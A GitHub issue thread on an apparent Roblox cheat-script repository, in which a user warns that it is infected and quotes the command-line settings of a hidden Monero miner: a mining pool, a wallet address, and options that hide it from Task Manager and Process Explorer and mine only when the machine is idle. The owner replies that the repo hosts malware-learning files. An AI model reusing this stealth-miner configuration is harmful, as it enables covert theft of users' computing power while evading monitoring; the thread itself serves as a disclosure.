### ISSUE TITLE
WARNING INFECTED !!!

### ISSUE THREAD

**Issue by OpenBulletAnomaly** [MJMODZZ/Roblox-Cheat-Script#1]
--algo=rx/0  --url=xmr.2miners.com:12222 --user="48Q5r42DnshBCULPq73bNXLwdJ2jng8QdDq6TZba79TGXL6Z4UNe61A2HUxqnNpUqn1JBZpm1Vv4XNxL28RBQUeR2RwVAGu.{COMPUTERNAME}" --pass="" --cpu-max-threads-hint=30 --cinit-stealth-targets="Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe" --cinit-version="3.1.0" --tls --cinit-idle-wait=3 --cinit-idle-cpu=100 --cinit-id="mswlxegobvfsxqtj"

Is mining XMR profitable for you anyway ???   
![image](https://user-images.githubusercontent.com/110566590/218276344-f03ce39d-8aca-454b-9419-83fa88197d3a.png)

**Comment by MJMODZZ** [comment]
> --algo=rx/0 --url=xmr.2miners.com:12222 --user="48Q5r42DnshBCULPq73bNXLwdJ2jng8QdDq6TZba79TGXL6Z4UNe61A2HUxqnNpUqn1JBZpm1Vv4XNxL28RBQUeR2RwVAGu.{COMPUTERNAME}" --pass="" --cpu-max-threads-hint=30 --cinit-stealth-targets="Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe" --cinit-version="3.1.0" --tls --cinit-idle-wait=3 --cinit-idle-cpu=100 --cinit-id="mswlxegobvfsxqtj"
> 
> Is mining XMR profitable for you anyway ??? ![image](https://user-images.githubusercontent.com/110566590/218276344-f03ce39d-8aca-454b-9419-83fa88197d3a.png)

its not about downloading this project and using it, i just personally use this repo to host files which i use to learn malware penetration and backdooring. I will change the readme now
